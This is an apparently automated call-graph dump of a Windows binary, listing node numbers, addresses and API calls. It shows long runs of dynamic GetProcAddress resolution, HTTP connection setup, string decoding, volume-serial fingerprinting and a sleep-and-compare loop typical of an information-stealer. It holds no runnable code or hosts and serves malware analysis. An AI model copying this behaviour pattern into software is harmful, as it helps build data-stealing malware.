lstrcpy 13717->13718 13719 655f5b 13718->13719 15289 650740 13719->15289 13721 655f60 13722 65a740 lstrcpy 13721->13722 13723 655f86 13722->13723 13724 641590 lstrcpy 13723->13724 13725 655f9a 13724->13725 13726 645960 34 API calls 13725->13726 13821 6445d1 RtlAllocateHeap 13820->13821 13824 644621 VirtualProtect 13821->13824 13824->13469 13825->13556 13827 6410c2 codecvt 13826->13827 13828 6410fd 13827->13828 13829 6410e2 VirtualFree 13827->13829 13828->13586 13829->13828 13831 641233 GlobalMemoryStatusEx 13830->13831 13831->13589 13832->13613 13834 65a7c2 13833->13834 13835 65a7ec 13834->13835 13836 65a7da lstrcpy 13834->13836 13835->13618 13836->13835 13838 65a740 lstrcpy 13837->13838 13839 656833 13838->13839 13840 65a9b0 4 API calls 13839->13840 13841 656845 13840->13841 13842 65a8a0 lstrcpy 13841->13842 13843 65684e 13842->13843 13844 65a9b0 4 API calls 13843->13844 13845 656867 13844->13845 13846 65a8a0 lstrcpy 13845->13846 13847 656870 13846->13847 13848 65a9b0 4 API calls 13847->13848 13849 65688a 13848->13849 13850 65a8a0 lstrcpy 13849->13850 13851 656893 13850->13851 13852 65a9b0 4 API calls 13851->13852 13853 6568ac 13852->13853 13854 65a8a0 lstrcpy 13853->13854 13855 6568b5 13854->13855 13856 65a9b0 4 API calls 13855->13856 13857 6568cf 13856->13857 13858 65a8a0 lstrcpy 13857->13858 13859 6568d8 13858->13859 13860 65a9b0 4 API calls 13859->13860 13861 6568f3 13860->13861 13862 65a8a0 lstrcpy 13861->13862 13863 6568fc 13862->13863 13864 65a7a0 lstrcpy 13863->13864 13865 656910 13864->13865 13865->13625 13867 65a812 13866->13867 13867->13628 13869 65a83f 13868->13869 13870 655b54 13869->13870 13871 65a87b lstrcpy 13869->13871 13870->13638 13871->13870 13873 65a8a0 lstrcpy 13872->13873 13874 656443 13873->13874 13875 65a8a0 lstrcpy 13874->13875 13876 656455 13875->13876 13877 65a8a0 lstrcpy 13876->13877 13878 656467 13877->13878 13879 65a8a0 lstrcpy 13878->13879 13880 655b86 13879->13880 13880->13644 13882 6445c0 2 API calls 13881->13882 13883 6426b4 13882->13883 13884 6445c0 2 API calls 13883->13884 13885 6426d7 13884->13885 13886 6445c0 2 API calls 13885->13886 13887 6426f0 13886->13887 13888 6445c0 2 API calls 13887->13888 13889 642709 13888->13889 13890 6445c0 2 API calls 13889->13890 13891 642736 13890->13891 13892 6445c0 2 API calls 13891->13892 13893 64274f 13892->13893 13894 6445c0 2 API calls 13893->13894 13895 642768 13894->13895 13896 6445c0 2 API calls 13895->13896 13897 642795 13896->13897 13898 6445c0 2 API calls 13897->13898 13899 6427ae 13898->13899 13900 6445c0 2 API calls 13899->13900 13901 6427c7 13900->13901 13902 6445c0 2 API calls 13901->13902 13903 6427e0 13902->13903 13904 6445c0 2 API calls 13903->13904 13905 6427f9 13904->13905 13906 6445c0 2 API calls 13905->13906 13907 642812 13906->13907 13908 6445c0 2 API calls 13907->13908 13909 64282b 13908->13909 13910 6445c0 2 API calls 13909->13910 13911 642844 13910->13911 13912 6445c0 2 API calls 13911->13912 13913 64285d 13912->13913 13914 6445c0 2 API calls 13913->13914 13915 642876 13914->13915 13916 6445c0 2 API calls 13915->13916 13917 64288f 13916->13917 13918 6445c0 2 API calls 13917->13918 13919 6428a8 13918->13919 13920 6445c0 2 API calls 13919->13920 13921 6428c1 13920->13921 13922 6445c0 2 API calls 13921->13922 13923 6428da 13922->13923 13924 6445c0 2 API calls 13923->13924 13925 6428f3 13924->13925 13926 6445c0 2 API calls 13925->13926 13927 64290c 13926->13927 13928 6445c0 2 API calls 13927->13928 13929 642925 13928->13929 13930 6445c0 2 API calls 13929->13930 13931 64293e 13930->13931 13932 6445c0 2 API calls 13931->13932 13933 642957 13932->13933 13934 6445c0 2 API calls 13933->13934 13935 642970 13934->13935 13936 6445c0 2 API calls 13935->13936 13937 642989 13936->13937 13938 6445c0 2 API calls 13937->13938 13939 6429a2 13938->13939 13940 6445c0 2 API calls 13939->13940 13941 6429bb 13940->13941 13942 6445c0 2 API calls 13941->13942 13943 6429d4 13942->13943 13944 6445c0 2 API calls 13943->13944 13945 6429ed 13944->13945 13946 6445c0 2 API calls 13945->13946 13947 642a06 13946->13947 13948 6445c0 2 API calls 13947->13948 13949 642a1f 13948->13949 13950 6445c0 2 API calls 13949->13950 13951 642a38 13950->13951 13952 6445c0 2 API calls 13951->13952 13953 642a51 13952->13953 13954 6445c0 2 API calls 13953->13954 13955 642a6a 13954->13955 13956 6445c0 2 API calls 13955->13956 13957 642a83 13956->13957 13958 6445c0 2 API calls 13957->13958 13959 642a9c 13958->13959 13960 6445c0 2 API calls 13959->13960 13961 642ab5 13960->13961 13962 6445c0 2 API calls 13961->13962 13963 642ace 13962->13963 13964 6445c0 2 API calls 13963->13964 13965 642ae7 13964->13965 13966 6445c0 2 API calls 13965->13966 13967 642b00 13966->13967 13968 6445c0 2 API calls 13967->13968 13969 642b19 13968->13969 13970 6445c0 2 API calls 13969->13970 13971 642b32 13970->13971 13972 6445c0 2 API calls 13971->13972 13973 642b4b 13972->13973 13974 6445c0 2 API calls 13973->13974 13975 642b64 13974->13975 13976 6445c0 2 API calls 13975->13976 13977 642b7d 13976->13977 13978 6445c0 2 API calls 13977->13978 13979 642b96 13978->13979 13980 6445c0 2 API calls 13979->13980 13981 642baf 13980->13981 13982 6445c0 2 API calls 13981->13982 13983 642bc8 13982->13983 13984 6445c0 2 API calls 13983->13984 13985 642be1 13984->13985 13986 6445c0 2 API calls 13985->13986 13987 642bfa 13986->13987 13988 6445c0 2 API calls 13987->13988 13989 642c13 13988->13989 13990 6445c0 2 API calls 13989->13990 13991 642c2c 13990->13991 13992 6445c0 2 API calls 13991->13992 13993 642c45 13992->13993 13994 6445c0 2 API calls 13993->13994 13995 642c5e 13994->13995 13996 6445c0 2 API calls 13995->13996 13997 642c77 13996->13997 13998 6445c0 2 API calls 13997->13998 13999 642c90 13998->13999 14000 6445c0 2 API calls 13999->14000 14001 642ca9 14000->14001 14002 6445c0 2 API calls 14001->14002 14003 642cc2 14002->14003 14004 6445c0 2 API calls 14003->14004 14005 642cdb 14004->14005 14006 6445c0 2 API calls 14005->14006 14007 642cf4 14006->14007 14008 6445c0 2 API calls 14007->14008 14009 642d0d 14008->14009 14010 6445c0 2 API calls 14009->14010 14011 642d26 14010->14011 14012 6445c0 2 API calls 14011->14012 14013 642d3f 14012->14013 14014 6445c0 2 API calls 14013->14014 14015 642d58 14014->14015 14016 6445c0 2 API calls 14015->14016 14017 642d71 14016->14017 14018 6445c0 2 API calls 14017->14018 14019 642d8a 14018->14019 14020 6445c0 2 API calls 14019->14020 14021 642da3 14020->14021 14022 6445c0 2 API calls 14021->14022 14023 642dbc 14022->14023 14024 6445c0 2 API calls 14023->14024 14025 642dd5 14024->14025 14026 6445c0 2 API calls 14025->14026 14027 642dee 14026->14027 14028 6445c0 2 API calls 14027->14028 14029 642e07 14028->14029 14030 6445c0 2 API calls 14029->14030 14031 642e20 14030->14031 14032 6445c0 2 API calls 14031->14032 14033 642e39 14032->14033 14034 6445c0 2 API calls 14033->14034 14035 642e52 14034->14035 14036 6445c0 2 API calls 14035->14036 14037 642e6b 14036->14037 14038 6445c0 2 API calls 14037->14038 14039 642e84 14038->14039 14040 6445c0 2 API calls 14039->14040 14041 642e9d 14040->14041 14042 6445c0 2 API calls 14041->14042 14043 642eb6 14042->14043 14044 6445c0 2 API calls 14043->14044 14045 642ecf 14044->14045 14046 6445c0 2 API calls 14045->14046 14047 642ee8 14046->14047 14048 6445c0 2 API calls 14047->14048 14049 642f01 14048->14049 14050 6445c0 2 API calls 14049->14050 14051 642f1a 14050->14051 14052 6445c0 2 API calls 14051->14052 14053 642f33 14052->14053 14054 6445c0 2 API calls 14053->14054 14055 642f4c 14054->14055 14056 6445c0 2 API calls 14055->14056 14057 642f65 14056->14057 14058 6445c0 2 API calls 14057->14058 14059 642f7e 14058->14059 14060 6445c0 2 API calls 14059->14060 14061 642f97 14060->14061 14062 6445c0 2 API calls 14061->14062 14063 642fb0 14062->14063 14064 6445c0 2 API calls 14063->14064 14065 642fc9 14064->14065 14066 6445c0 2 API calls 14065->14066 14067 642fe2 14066->14067 14068 6445c0 2 API calls 14067->14068 14069 642ffb 14068->14069 14070 6445c0 2 API calls 14069->14070 14071 643014 14070->14071 14072 6445c0 2 API calls 14071->14072 14073 64302d 14072->14073 14074 6445c0 2 API calls 14073->14074 14075 643046 14074->14075 14076 6445c0 2 API calls 14075->14076 14077 64305f 14076->14077 14078 6445c0 2 API calls 14077->14078 14079 643078 14078->14079 14080 6445c0 2 API calls 14079->14080 14081 643091 14080->14081 14082 6445c0 2 API calls 14081->14082 14083 6430aa 14082->14083 14084 6445c0 2 API calls 14083->14084 14085 6430c3 14084->14085 14086 6445c0 2 API calls 14085->14086 14087 6430dc 14086->14087 14088 6445c0 2 API calls 14087->14088 14089 6430f5 14088->14089 14090 6445c0 2 API calls 14089->14090 14091 64310e 14090->14091 14092 6445c0 2 API calls 14091->14092 14093 643127 14092->14093 14094 6445c0 2 API calls 14093->14094 14095 643140 14094->14095 14096 6445c0 2 API calls 14095->14096 14097 643159 14096->14097 14098 6445c0 2 API calls 14097->14098 14099 643172 14098->14099 14100 6445c0 2 API calls 14099->14100 14101 64318b 14100->14101 14102 6445c0 2 API calls 14101->14102 14103 6431a4 14102->14103 14104 6445c0 2 API calls 14103->14104 14105 6431bd 14104->14105 14106 6445c0 2 API calls 14105->14106 14107 6431d6 14106->14107 14108 6445c0 2 API calls 14107->14108 14109 6431ef 14108->14109 14110 6445c0 2 API calls 14109->14110 14111 643208 14110->14111 14112 6445c0 2 API calls 14111->14112 14113 643221 14112->14113 14114 6445c0 2 API calls 14113->14114 14115 64323a 14114->14115 14116 6445c0 2 API calls 14115->14116 14117 643253 14116->14117 14118 6445c0 2 API calls 14117->14118 14119 64326c 14118->14119 14120 6445c0 2 API calls 14119->14120 14121 643285 14120->14121 14122 6445c0 2 API calls 14121->14122 14123 64329e 14122->14123 14124 6445c0 2 API calls 14123->14124 14125 6432b7 14124->14125 14126 6445c0 2 API calls 14125->14126 14127 6432d0 14126->14127 14128 6445c0 2 API calls 14127->14128 14129 6432e9 14128->14129 14130 6445c0 2 API calls 14129->14130 14131 643302 14130->14131 14132 6445c0 2 API calls 14131->14132 14133 64331b 14132->14133 14134 6445c0 2 API calls 14133->14134 14135 643334 14134->14135 14136 6445c0 2 API calls 14135->14136 14137 64334d 14136->14137 14138 6445c0 2 API calls 14137->14138 14139 643366 14138->14139 14140 6445c0 2 API calls 14139->14140 14141 64337f 14140->14141 14142 6445c0 2 API calls 14141->14142 14143 643398 14142->14143 14144 6445c0 2 API calls 14143->14144 14145 6433b1 14144->14145 14146 6445c0 2 API calls 14145->14146 14147 6433ca 14146->14147 14148 6445c0 2 API calls 14147->14148 14149 6433e3 14148->14149 14150 6445c0 2 API calls 14149->14150 14151 6433fc 14150->14151 14152 6445c0 2 API calls 14151->14152 14153 643415 14152->14153 14154 6445c0 2 API calls 14153->14154 14155 64342e 14154->14155 14156 6445c0 2 API calls 14155->14156 14157 643447 14156->14157 14158 6445c0 2 API calls 14157->14158 14159 643460 14158->14159 14160 6445c0 2 API calls 14159->14160 14161 643479 14160->14161 14162 6445c0 2 API calls 14161->14162 14163 643492 14162->14163 14164 6445c0 2 API calls 14163->14164 14165 6434ab 14164->14165 14166 6445c0 2 API calls 14165->14166 14167 6434c4 14166->14167 14168 6445c0 2 API calls 14167->14168 14169 6434dd 14168->14169 14170 6445c0 2 API calls 14169->14170 14171 6434f6 14170->14171 14172 6445c0 2 API calls 14171->14172 14173 64350f 14172->14173 14174 6445c0 2 API calls 14173->14174 14175 643528 14174->14175 14176 6445c0 2 API calls 14175->14176 14177 643541 14176->14177 14178 6445c0 2 API calls 14177->14178 14179 64355a 14178->14179 14180 6445c0 2 API calls 14179->14180 14181 643573 14180->14181 14182 6445c0 2 API calls 14181->14182 14183 64358c 14182->14183 14184 6445c0 2 API calls 14183->14184 14185 6435a5 14184->14185 14186 6445c0 2 API calls 14185->14186 14187 6435be 14186->14187 14188 6445c0 2 API calls 14187->14188 14189 6435d7 14188->14189 14190 6445c0 2 API calls 14189->14190 14191 6435f0 14190->14191 14192 6445c0 2 API calls 14191->14192 14193 643609 14192->14193 14194 6445c0 2 API calls 14193->14194 14195 643622 14194->14195 14196 6445c0 2 API calls 14195->14196 14197 64363b 14196->14197 14198 6445c0 2 API calls 14197->14198 14199 643654 14198->14199 14200 6445c0 2 API calls 14199->14200 14201 64366d 14200->14201 14202 6445c0 2 API calls 14201->14202 14203 643686 14202->14203 14204 6445c0 2 API calls 14203->14204 14205 64369f 14204->14205 14206 6445c0 2 API calls 14205->14206 14207 6436b8 14206->14207 14208 6445c0 2 API calls 14207->14208 14209 6436d1 14208->14209 14210 6445c0 2 API calls 14209->14210 14211 6436ea 14210->14211 14212 6445c0 2 API calls 14211->14212 14213 643703 14212->14213 14214 6445c0 2 API calls 14213->14214 14215 64371c 14214->14215 14216 6445c0 2 API calls 14215->14216 14217 643735 14216->14217 14218 6445c0 2 API calls 14217->14218 14219 64374e 14218->14219 14220 6445c0 2 API calls 14219->14220 14221 643767 14220->14221 14222 6445c0 2 API calls 14221->14222 14223 643780 14222->14223 14224 6445c0 2 API calls 14223->14224 14225 643799 14224->14225 14226 6445c0 2 API calls 14225->14226 14227 6437b2 14226->14227 14228 6445c0 2 API calls 14227->14228 14229 6437cb 14228->14229 14230 6445c0 2 API calls 14229->14230 14231 6437e4 14230->14231 14232 6445c0 2 API calls 14231->14232 14233 6437fd 14232->14233 14234 6445c0 2 API calls 14233->14234 14235 643816 14234->14235 14236 6445c0 2 API calls 14235->14236 14237 64382f 14236->14237 14238 6445c0 2 API calls 14237->14238 14239 643848 14238->14239 14240 6445c0 2 API calls 14239->14240 14241 643861 14240->14241 14242 6445c0 2 API calls 14241->14242 14243 64387a 14242->14243 14244 6445c0 2 API calls 14243->14244 14245 643893 14244->14245 14246 6445c0 2 API calls 14245->14246 14247 6438ac 14246->14247 14248 6445c0 2 API calls 14247->14248 14249 6438c5 14248->14249 14250 6445c0 2 API calls 14249->14250 14251 6438de 14250->14251 14252 6445c0 2 API calls 14251->14252 14253 6438f7 14252->14253 14254 6445c0 2 API calls 14253->14254 14255 643910 14254->14255 14256 6445c0 2 API calls 14255->14256 14257 643929 14256->14257 14258 6445c0 2 API calls 14257->14258 14259 643942 14258->14259 14260 6445c0 2 API calls 14259->14260 14261 64395b 14260->14261 14262 6445c0 2 API calls 14261->14262 14263 643974 14262->14263 14264 6445c0 2 API calls 14263->14264 14265 64398d 14264->14265 14266 6445c0 2 API calls 14265->14266 14267 6439a6 14266->14267 14268 6445c0 2 API calls 14267->14268 14269 6439bf 14268->14269 14270 6445c0 2 API calls 14269->14270 14271 6439d8 14270->14271 14272 6445c0 2 API calls 14271->14272 14273 6439f1 14272->14273 14274 6445c0 2 API calls 14273->14274 14275 643a0a 14274->14275 14276 6445c0 2 API calls 14275->14276 14277 643a23 14276->14277 14278 6445c0 2 API calls 14277->14278 14279 643a3c 14278->14279 14280 6445c0 2 API calls 14279->14280 14281 643a55 14280->14281 14282 6445c0 2 API calls 14281->14282 14283 643a6e 14282->14283 14284 6445c0 2 API calls 14283->14284 14285 643a87 14284->14285 14286 6445c0 2 API calls 14285->14286 14287 643aa0 14286->14287 14288 6445c0 2 API calls 14287->14288 14289 643ab9 14288->14289 14290 6445c0 2 API calls 14289->14290 14291 643ad2 14290->14291 14292 6445c0 2 API calls 14291->14292 14293 643aeb 14292->14293 14294 6445c0 2 API calls 14293->14294 14295 643b04 14294->14295 14296 6445c0 2 API calls 14295->14296 14297 643b1d 14296->14297 14298 6445c0 2 API calls 14297->14298 14299 643b36 14298->14299 14300 6445c0 2 API calls 14299->14300 14301 643b4f 14300->14301 14302 6445c0 2 API calls 14301->14302 14303 643b68 14302->14303 14304 6445c0 2 API calls 14303->14304 14305 643b81 14304->14305 14306 6445c0 2 API calls 14305->14306 14307 643b9a 14306->14307 14308 6445c0 2 API calls 14307->14308 14309 643bb3 14308->14309 14310 6445c0 2 API calls 14309->14310 14311 643bcc 14310->14311 14312 6445c0 2 API calls 14311->14312 14313 643be5 14312->14313 14314 6445c0 2 API calls 14313->14314 14315 643bfe 14314->14315 14316 6445c0 2 API calls 14315->14316 14317 643c17 14316->14317 14318 6445c0 2 API calls 14317->14318 14319 643c30 14318->14319 14320 6445c0 2 API calls 14319->14320 14321 643c49 14320->14321 14322 6445c0 2 API calls 14321->14322 14323 643c62 14322->14323 14324 6445c0 2 API calls 14323->14324 14325 643c7b 14324->14325 14326 6445c0 2 API calls 14325->14326 14327 643c94 14326->14327 14328 6445c0 2 API calls 14327->14328 14329 643cad 14328->14329 14330 6445c0 2 API calls 14329->14330 14331 643cc6 14330->14331 14332 6445c0 2 API calls 14331->14332 14333 643cdf 14332->14333 14334 6445c0 2 API calls 14333->14334 14335 643cf8 14334->14335 14336 6445c0 2 API calls 14335->14336 14337 643d11 14336->14337 14338 6445c0 2 API calls 14337->14338 14339 643d2a 14338->14339 14340 6445c0 2 API calls 14339->14340 14341 643d43 14340->14341 14342 6445c0 2 API calls 14341->14342 14343 643d5c 14342->14343 14344 6445c0 2 API calls 14343->14344 14345 643d75 14344->14345 14346 6445c0 2 API calls 14345->14346 14347 643d8e 14346->14347 14348 6445c0 2 API calls 14347->14348 14349 643da7 14348->14349 14350 6445c0 2 API calls 14349->14350 14351 643dc0 14350->14351 14352 6445c0 2 API calls 14351->14352 14353 643dd9 14352->14353 14354 6445c0 2 API calls 14353->14354 14355 643df2 14354->14355 14356 6445c0 2 API calls 14355->14356 14357 643e0b 14356->14357 14358 6445c0 2 API calls 14357->14358 14359 643e24 14358->14359 14360 6445c0 2 API calls 14359->14360 14361 643e3d 14360->14361 14362 6445c0 2 API calls 14361->14362 14363 643e56 14362->14363 14364 6445c0 2 API calls 14363->14364 14365 643e6f 14364->14365 14366 6445c0 2 API calls 14365->14366 14367 643e88 14366->14367 14368 6445c0 2 API calls 14367->14368 14369 643ea1 14368->14369 14370 6445c0 2 API calls 14369->14370 14371 643eba 14370->14371 14372 6445c0 2 API calls 14371->14372 14373 643ed3 14372->14373 14374 6445c0 2 API calls 14373->14374 14375 643eec 14374->14375 14376 6445c0 2 API calls 14375->14376 14377 643f05 14376->14377 14378 6445c0 2 API calls 14377->14378 14379 643f1e 14378->14379 14380 6445c0 2 API calls 14379->14380 14381 643f37 14380->14381 14382 6445c0 2 API calls 14381->14382 14383 643f50 14382->14383 14384 6445c0 2 API calls 14383->14384 14385 643f69 14384->14385 14386 6445c0 2 API calls 14385->14386 14387 643f82 14386->14387 14388 6445c0 2 API calls 14387->14388 14389 643f9b 14388->14389 14390 6445c0 2 API calls 14389->14390 14391 643fb4 14390->14391 14392 6445c0 2 API calls 14391->14392 14393 643fcd 14392->14393 14394 6445c0 2 API calls 14393->14394 14395 643fe6 14394->14395 14396 6445c0 2 API calls 14395->14396 14397 643fff 14396->14397 14398 6445c0 2 API calls 14397->14398 14399 644018 14398->14399 14400 6445c0 2 API calls 14399->14400 14401 644031 14400->14401 14402 6445c0 2 API calls 14401->14402 14403 64404a 14402->14403 14404 6445c0 2 API calls 14403->14404 14405 644063 14404->14405 14406 6445c0 2 API calls 14405->14406 14407 64407c 14406->14407 14408 6445c0 2 API calls 14407->14408 14409 644095 14408->14409 14410 6445c0 2 API calls 14409->14410 14411 6440ae 14410->14411 14412 6445c0 2 API calls 14411->14412 14413 6440c7 14412->14413 14414 6445c0 2 API calls 14413->14414 14415 6440e0 14414->14415 14416 6445c0 2 API calls 14415->14416 14417 6440f9 14416->14417 14418 6445c0 2 API calls 14417->14418 14419 644112 14418->14419 14420 6445c0 2 API calls 14419->14420 14421 64412b 14420->14421 14422 6445c0 2 API calls 14421->14422 14423 644144 14422->14423 14424 6445c0 2 API calls 14423->14424 14425 64415d 14424->14425 14426 6445c0 2 API calls 14425->14426 14427 644176 14426->14427 14428 6445c0 2 API calls 14427->14428 14429 64418f 14428->14429 14430 6445c0 2 API calls 14429->14430 14431 6441a8 14430->14431 14432 6445c0 2 API calls 14431->14432 14433 6441c1 14432->14433 14434 6445c0 2 API calls 14433->14434 14435 6441da 14434->14435 14436 6445c0 2 API calls 14435->14436 14437 6441f3 14436->14437 14438 6445c0 2 API calls 14437->14438 14439 64420c 14438->14439 14440 6445c0 2 API calls 14439->14440 14441 644225 14440->14441 14442 6445c0 2 API calls 14441->14442 14443 64423e 14442->14443 14444 6445c0 2 API calls 14443->14444 14445 644257 14444->14445 14446 6445c0 2 API calls 14445->14446 14447 644270 14446->14447 14448 6445c0 2 API calls 14447->14448 14449 644289 14448->14449 14450 6445c0 2 API calls 14449->14450 14451 6442a2 14450->14451 14452 6445c0 2 API calls 14451->14452 14453 6442bb 14452->14453 14454 6445c0 2 API calls 14453->14454 14455 6442d4 14454->14455 14456 6445c0 2 API calls 14455->14456 14457 6442ed 14456->14457 14458 6445c0 2 API calls 14457->14458 14459 644306 14458->14459 14460 6445c0 2 API calls 14459->14460 14461 64431f 14460->14461 14462 6445c0 2 API calls 14461->14462 14463 644338 14462->14463 14464 6445c0 2 API calls 14463->14464 14465 644351 14464->14465 14466 6445c0 2 API calls 14465->14466 14467 64436a 14466->14467 14468 6445c0 2 API calls 14467->14468 14469 644383 14468->14469 14470 6445c0 2 API calls 14469->14470 14471 64439c 14470->14471 14472 6445c0 2 API calls 14471->14472 14473 6443b5 14472->14473 14474 6445c0 2 API calls 14473->14474 14475 6443ce 14474->14475 14476 6445c0 2 API calls 14475->14476 14477 6443e7 14476->14477 14478 6445c0 2 API calls 14477->14478 14479 644400 14478->14479 14480 6445c0 2 API calls 14479->14480 14481 644419 14480->14481 14482 6445c0 2 API calls 14481->14482 14483 644432 14482->14483 14484 6445c0 2 API calls 14483->14484 14485 64444b 14484->14485 14486 6445c0 2 API calls 14485->14486 14487 644464 14486->14487 14488 6445c0 2 API calls 14487->14488 14489 64447d 14488->14489 14490 6445c0 2 API calls 14489->14490 14491 644496 14490->14491 14492 6445c0 2 API calls 14491->14492 14493 6444af 14492->14493 14494 6445c0 2 API calls 14493->14494 14495 6444c8 14494->14495 14496 6445c0 2 API calls 14495->14496 14497 6444e1 14496->14497 14498 6445c0 2 API calls 14497->14498 14499 6444fa 14498->14499 14500 6445c0 2 API calls 14499->14500 14501 644513 14500->14501 14502 6445c0 2 API calls 14501->14502 14503 64452c 14502->14503 14504 6445c0 2 API calls 14503->14504 14505 644545 14504->14505 14506 6445c0 2 API calls 14505->14506 14507 64455e 14506->14507 14508 6445c0 2 API calls 14507->14508 14509 644577 14508->14509 14510 6445c0 2 API calls 14509->14510 14511 644590 14510->14511 14512 6445c0 2 API calls 14511->14512 14513 6445a9 14512->14513 14514 659c10 14513->14514 14515 65a036 8 API calls 14514->14515 14516 659c20 43 API calls 14514->14516 14517 65a146 14515->14517 14518 65a0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14515->14518 14516->14515 14519 65a216 14517->14519 14520 65a153 8 API calls 14517->14520 14518->14517 14521 65a21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14519->14521 14522 65a298 14519->14522 14520->14519 14521->14522 14523 65a2a5 6 API calls 14522->14523 14524 65a337 14522->14524 14523->14524 14525 65a344 9 API calls 14524->14525 14526 65a41f 14524->14526 14525->14526 14527 65a4a2 14526->14527 14528 65a428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14526->14528 14529 65a4dc 14527->14529 14530 65a4ab GetProcAddress GetProcAddress 14527->14530 14528->14527 14531 65a515 14529->14531 14532 65a4e5 GetProcAddress GetProcAddress 14529->14532 14530->14529 14533 65a612 14531->14533 14534 65a522 10 API calls 14531->14534 14532->14531 14535 65a67d 14533->14535 14536 65a61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14533->14536 14534->14533 14537 65a686 GetProcAddress 14535->14537 14538 65a69e 14535->14538 14536->14535 14537->14538 14539 65a6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14538->14539 14540 655ca3 14538->14540 14539->14540 14541 641590 14540->14541 15660 641670 14541->15660 14544 65a7a0 lstrcpy 14545 6415b5 14544->14545 14546 65a7a0 lstrcpy 14545->14546 14547 6415c7 14546->14547 14548 65a7a0 lstrcpy 14547->14548 14549 6415d9 14548->14549 14550 65a7a0 lstrcpy 14549->14550 14551 641663 14550->14551 14552 655510 14551->14552 14553 655521 14552->14553 14554 65a820 2 API calls 14553->14554 14555 65552e 14554->14555 14556 65a820 2 API calls 14555->14556 14557 65553b 14556->14557 14558 65a820 2 API calls 14557->14558 14559 655548 14558->14559 14560 65a740 lstrcpy 14559->14560 14561 655555 14560->14561 14562 65a740 lstrcpy 14561->14562 14563 655562 14562->14563 14564 65a740 lstrcpy 14563->14564 14565 65556f 14564->14565 14566 65a740 lstrcpy 14565->14566 14606 65557c 14566->14606 14567 65a740 lstrcpy 14567->14606 14568 65a7a0 lstrcpy 14568->14606 14569 655643 StrCmpCA 14569->14606 14570 6556a0 StrCmpCA 14571 6557dc 14570->14571 14570->14606 14572 65a8a0 lstrcpy 14571->14572 14573 6557e8 14572->14573 14574 65a820 2 API calls 14573->14574 14576 6557f6 14574->14576 14575 65a820 lstrlen lstrcpy 14575->14606 14579 65a820 2 API calls 14576->14579 14577 655856 StrCmpCA 14580 655991 14577->14580 14577->14606 14578 6551f0 20 API calls 14578->14606 14582 655805 14579->14582 14581 65a8a0 lstrcpy 14580->14581 14583 65599d 14581->14583 14584 641670 lstrcpy 14582->14584 14586 65a820 2 API calls 14583->14586 14604 655811 14584->14604 14585 641590 lstrcpy 14585->14606 14587 6559ab 14586->14587 14590 65a820 2 API calls 14587->14590 14588 655a0b StrCmpCA 14591 655a16 Sleep 14588->14591 14592 655a28 14588->14592 14589 6552c0 25 API calls 14589->14606 14593 6559ba 14590->14593 14591->14606 14594 65a8a0 lstrcpy 14592->14594 14596 641670 lstrcpy 14593->14596 14597 655a34 14594->14597 14595 65a8a0 lstrcpy 14595->14606 14596->14604 14598 65a820 2 API calls 14597->14598 14599 655a43 14598->14599 14600 65a820 2 API calls 14599->14600 14602 655a52 14600->14602 14601 65578a StrCmpCA 14601->14606 14603 641670 lstrcpy 14602->14603 14603->14604 14604->13659 14605 65593f StrCmpCA 14605->14606 14606->14567 14606->14568 14606->14569 14606->14570 14606->14575 14606->14577 14606->14578 14606->14585 14606->14588 14606->14589 14606->14595 14606->14601 14606->14605 14608 657553 GetVolumeInformationA 14607->14608 14609 65754c 14607->14609 14610 657591 14608->14610 14609->14608 14611 6575fc GetProcessHeap RtlAllocateHeap 14610->14611 14612 657619 14611->14612 14613 657628 wsprintfA 14611->14613 14615 65a740 lstrcpy 14612->14615 14614 65a740 lstrcpy 14613->14614 14616 655da7 14614->14616 14615->14616 14616->13680 14618 65a7a0 lstrcpy 14617->14618 14619 644899 14618->14619 15669 6447b0 14619->15669 14621 6448a5 14622 65a740 lstrcpy 14621->14622 14623 6448d7 14622->14623 14624 65a740 lstrcpy 14623->14624 14625 6448e4 14624->14625 14626 65a740 lstrcpy 14625->14626 14627 6448f1 14626->14627 14628 65a740 lstrcpy 14627->14628 14629 6448fe 14628->14629 14630 65a740 lstrcpy 14629->14630 14631 64490b InternetOpenA StrCmpCA 14630->14631 14632 644944 14631->14632 14633 644ecb InternetCloseHandle 14632->14633 15675 658b60 14632->15675 14635 644ee8 14633->14635 15690 649ac0 CryptStringToBinaryA 14635->15690 14636 644963 15683 65a920 14636->15683 14639 644976 14641 65a8a0 lstrcpy 14639->14641 14647 64497f 14641->14647 14642 65a820 2 API calls 14643 644f05 14642->14643 14644 65a9b0 4 API calls 14643->14644 14646 644f1b 14644->14646 14645 644f27 codecvt 14649 65a7a0 lstrcpy 14645->14649 14648 65a8a0 lstrcpy 14646->14648 14650 65a9b0 4 API calls 14647->14650 14648->14645 14661 644f57 14649->14661 14651 6449a9 14650->14651 14652 65a8a0 lstrcpy 14651->14652 14653 6449b2 14652->14653 14654 65a9b0 4 API calls 14653->14654 14655 6449d1 14654->14655 14656 65a8a0 lstrcpy 14655->14656 14657 6449da 14656->14657 14658 65a920 3 API calls 14657->14658 14659 6449f8 14658->14659 14660 65a8a0 lstrcpy 14659->14660 14662 644a01 14660->14662 14661->13683 14663 65a9b0 4 API calls 14662->14663 14664 644a20 14663->14664 14665 65a8a0 lstrcpy 14664->14665 14666 644a29 14665->14666 14667 65a9b0 4 API calls 14666->14667 14668 644a48 14667->14668 14669 65a8a0 lstrcpy 14668->14669 14670 644a51 14669->14670 14671 65a9b0 4 API calls 14670->14671 14672 644a7d 14671->14672 14673 65a920 3 API calls 14672->14673 14674 644a84 14673->14674 14675 65a8a0 lstrcpy 14674->14675 14676 644a8d 14675->14676 14677 644aa3 InternetConnectA 14676->14677 14677->14633 14678 644ad3 HttpOpenRequestA 14677->14678 14680 644ebe InternetCloseHandle 14678->14680 14681 644b28 14678->14681 14680->14633 14682 65a9b0 4 API calls 14681->14682 14683 644b3c 14682->14683 14684 65a8a0 lstrcpy 14683->14684 14685 644b45 14684->14685 14686 65a920 3 API calls 14685->14686 14687 644b63 14686->14687 14688 65a8a0 lstrcpy 14687->14688 14689 644b6c 14688->14689 14690 65a9b0 4 API calls 14689->14690 14691 644b8b 14690->14691 14692 65a8a0 lstrcpy 14691->14692 14693 644b94 14692->14693 14694 65a9b0 4 API calls 14693->14694 14695 644bb5 14694->14695 14696 65a8a0 lstrcpy 14695->14696 14697 644bbe 14696->14697 14698 65a9b0 4 API calls 14697->14698 14699 644bde 